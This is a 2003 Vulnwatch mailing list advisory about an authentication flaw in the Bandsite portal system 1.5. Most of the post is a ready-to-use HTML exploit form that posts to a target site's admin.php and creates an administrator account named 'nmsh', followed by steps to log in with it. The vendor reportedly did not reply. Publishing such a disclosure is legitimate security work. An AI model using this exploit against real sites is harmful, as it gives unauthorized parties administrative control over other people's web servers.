Vulnwatch mailing list archives
vulnerability in Bandsite Allows Gaining Admin Access.
From: "NaSsEr .M.Sh" <nmsh_sa () yahoo com>
Date: Fri, 12 Sep 2003 03:47:15 -0700 (PDT)
Informations : °°°°°°°°°°°°°° - Product : Bandsite portal system - Website : http://membres.lycos.fr/fluxx/bandwebsite.php - Author : Jelle de Vos - Tested version :1.5 - Problem : vulnerability in Bandsite Allows Gaining Admin Access. Product Description : °°°°°°°°°°°°°°°°°°°°° Bandsite is an online portal system designed for Bands. Features: themes support, news posting, audio sections, guestbook, tour guide, an admin section to manage overall data and configurations, and more. Exploits : °°°°°°°°°° ===================== nmsh.htm ============================== <TABLE cellSpacing=1 cellPadding=5 width=570 bgColor=#665E6B border=0> <TBODY> <tr><td bgcolor=#ffffff> </p> <p> <form action=http://[target]/bandwebsite/admin.php?&Login=1§ion=admins method=post> Name:<br> <input type=text name='name' value='nmsh' size="20"><br> Pass:<br> <input type=text name='pass' value='nmsh' size="20"><br> <input type=submit name='submit' value='send'><br> </form></TD></TR></TBODY></TABLE> <P><BR></P></TD></TR></TBODY></TABLE></BODY> ===================== nmsh.htm ============================== The admin has been added! :( now go to this link : http://[target]/bandwebsite/login.php and login as admin name : nmsh pass : nmsh Vendor: °°°°°°° Vendor has been contacted, no reply received. Provided by : °°°°°°°°°°°°° Nasser.M.Sh nmsh_sa(at)yahoo.com --------------------------------- Do you Yahoo!? Yahoo! SiteBuilder - Free, easy-to-use web site design software
Current thread:
- vulnerability in Bandsite Allows Gaining Admin Access. NaSsEr .M.Sh (Sep 12)